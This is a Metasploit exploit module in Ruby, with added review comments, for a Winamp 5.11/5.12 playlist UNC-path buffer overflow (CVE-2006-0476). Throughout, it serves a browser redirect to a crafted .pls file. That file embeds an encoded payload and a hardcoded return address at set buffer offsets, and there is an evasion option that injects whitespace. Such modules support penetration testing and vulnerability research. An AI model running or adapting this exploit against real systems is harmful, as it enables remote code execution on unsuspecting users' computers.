##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server: it answers any request that is
  # not already a .pls URI with an HTML redirect to a randomly named .pls
  # resource, then serves a text/plain PLS playlist whose last File entry
  # is an overlong UNC path carrying the payload (see generate_playlist).
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (references CVE-2006-0476 / OSVDB 22789 /
  # BID 16410), payload constraints and the single target, then adds the
  # PlaylistSpaceInjection evasion option used by generate_space.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Winamp Playlist UNC Path Computer Name Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the Winamp media player.
        This flaw is triggered when a audio file path is specified, inside a
        playlist, that consists of a UNC path with a long computer name. This
        module delivers the playlist via the browser. This module has only
        been successfully tested on Winamp 5.11 and 5.12.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
          'Faithless <rhyskidd[at]gmail.com>'
        ],
      'Version'        => '$Revision$',
      'References'     =>
        [
          ['CVE', '2006-0476'],
          ['OSVDB', '22789'],
          ['BID', '16410'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # 526 bytes: the payload is written at offset 0 of a 1026-byte
          # buffer whose last four bytes hold the return address
          # (generate_playlist), so it must stay well below offset 1022.
          'Space'    => 526,
          # Bytes that would terminate or split the UNC path / playlist
          # line: NUL, backslash, slash, CR, LF, space.
          'BadChars' => "\x00\x5c\x2f\x0a\x0d\x20",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },

          # Landing on \x5c\x5c trashes esp, restore from ecx
          'PrependEncoder' => "\x87\xe1",
          'StackAdjustment' => -3500,

          # Dont need them, dont want them, preserve esi
          'DisableNops' => true,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
          [ 'Winamp 5.12 Universal', { 'Ret' => 0x0d45fece }],
        ],
      'DisclosureDate' => 'Jan 29 2006',
      'DefaultTarget'  => 0))

    # NOTE(review): the description string carries a stray trailing '"'
    # and the default is given as the string 'false' rather than a
    # boolean; generate_space compares the datastore value with `== true`,
    # so whether this option ever enables depends on the datastore
    # normalising booleans — confirm against the framework version in use.
    register_evasion_options(
      [
        OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
      ])
  end

  # HTTP request handler.
  #
  # A request whose URI does not end in .pls gets a small HTML page that
  # sets document.location to "<resource>/<random>.pls"; a .pls request
  # gets the generated playlist as text/plain and starts the handler.
  # From the network side the observable sequence is therefore an HTML
  # redirect to a random alphanumeric .pls name followed by a PLS body
  # containing a roughly 1 KB "\\" File entry.
  #
  # @param cli [Object] connected client handed in by the HTTP server mixin
  # @param request [Object] parsed request; only request.uri is read here
  # @return [nil]
  def on_request_uri(cli, request)

    if (not request.uri.match(/\.pls$/i))
      # Strip one trailing "/" from the configured resource path so the
      # random .pls name is appended with exactly one separator.
      if ("/" == get_resource[-1,1])
        pls_uri = get_resource[0, get_resource.length - 1]
      else
        # NOTE(review): in this branch pls_uri aliases the object returned
        # by get_resource, and the `<<` below mutates it in place; if
        # get_resource hands back the stored resource string rather than a
        # copy, the module's own resource is extended on every request —
        # verify, and use `get_resource.dup` if so.
        pls_uri = get_resource
      end
      pls_uri << "/" + rand_text_alphanumeric(rand(80)+16) + ".pls"
      html =
        "<html><body>"+
        "<script>" +
        "document.location='#{pls_uri}'</script>" +
        "One second please...</body></html>"
      send_response_html(cli, html)
      return
    end

    # Re-generate the payload; give up silently on this request if the
    # framework could not produce one for this client.
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")

    # Transmit the playlist to the client as plain text (no compression
    # is applied here despite what older comments said).
    send_response(cli, generate_playlist(p), { 'Content-Type' => 'text/plain' })

    # Handle the payload
    handler(cli)
  end

  # Builds the PLS playlist text.
  #
  # 10–19 benign entries are emitted first, then one more entry whose
  # File value is "\\" followed by a 1026-byte buffer: the encoded payload
  # at offset 0 and the target return address (little-endian, 'V') at
  # offset 1022. The payload is written after the return address, so a
  # payload longer than 1022 bytes would overwrite it; 'Space' => 526 in
  # initialize keeps it in bounds.
  #
  # @param payload [Object] regenerated payload; only payload.encoded is read
  # @return [String] complete playlist body, CRLF line endings
  def generate_playlist(payload)

    pcnt = rand(10)+10;

    file = rand_text_english(1026)
    file[1022 , 4] = [target.ret].pack('V')
    file[0, payload.encoded.length] = payload.encoded

    play =
      "[playlist]\r\n" +
      generate_songs(pcnt) +
      generate_song(pcnt + 1, "\\\\#{file}") +
      generate_line('NumberOfEntries', "#{pcnt+1}") +
      generate_line('Version', '2')
    return play
  end

  # Optional whitespace filler inserted around every key, '=' and value
  # by generate_line when the PlaylistSpaceInjection evasion option is on.
  #
  # @return [String] 1–100 random space/tab characters, or '' when disabled
  def generate_space
    # NOTE(review): this only fires if the datastore yields the boolean
    # true; a string "true" would not match — see the option in initialize.
    if datastore['PlaylistSpaceInjection'] == true
      return rand_text(rand(100)+1, nil, " \t")
    else
      return ''
    end
  end

  # One PLS entry: FileN, TitleN (random alphanumeric) and LengthN.
  #
  # @param id [Integer] 1-based entry index
  # @param file [String] value written after "File#{id}="
  # @return [String] three CRLF-terminated lines
  def generate_song(id, file)
    return generate_line("File#{id}", file) +
      generate_line("Title#{id}", rand_text_alphanumeric(rand(64)+1)) +
      # "%x" renders the length in hex; PLS readers normally expect decimal
      # seconds, so this is presumably only filler — confirm if it matters.
      generate_line("Length#{id}", "%x" % (rand(1024) + 30))
  end

  # Formats "key=value\r\n", with generate_space filler before and after
  # the key, the '=' and the value.
  #
  # @param key [String]
  # @param value [String]
  # @return [String]
  def generate_line(key, value)
    return generate_space + key + generate_space + '=' + generate_space + value + generate_space + "\r\n"
  end

  # Concatenates cnt benign entries (random alphanumeric file names).
  #
  # @param cnt [Integer] number of entries, numbered 1..cnt
  # @return [String]
  def generate_songs(cnt)
    songs = ''
    1.upto(cnt) do |i|
      songs << generate_song(i, rand_text_alphanumeric(rand(64)+1))
    end
    return songs
  end

end